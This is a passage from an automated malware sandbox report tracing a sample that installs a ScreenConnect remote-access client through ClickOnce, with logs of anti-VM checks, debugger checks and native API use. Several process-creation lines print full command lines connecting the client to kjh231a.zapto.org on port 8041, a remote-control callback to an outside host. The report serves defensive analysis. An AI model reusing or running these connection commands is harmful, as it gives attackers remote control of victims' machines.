                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593357Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593030Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2920865810.000002A17405B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3287387704.00000246CF854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285134135.000002487ACDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284726965.000002487AC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000006.00000002.3285369164.00000246CA02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW P
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.3285367040.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr{
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000007.00000002.3285828510.000002487BC56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC191F
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC3677 mov eax, dword ptr fs:[00000030h]0_2_00AC3677
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC6893 GetProcessHeap,0_2_00AC6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC1493
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC191F
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC4573
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1AAC SetUnhandledExceptionFilter,0_2_00AC1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\np1y8xrr.mxl\jz9qewok.6wb\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\np1y8xrr.mxl\jz9qewok.6wb\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\np1y8xrr.mxl\jz9qewok.6wb\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1BD4 cpuid 0_2_00AC1BD4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
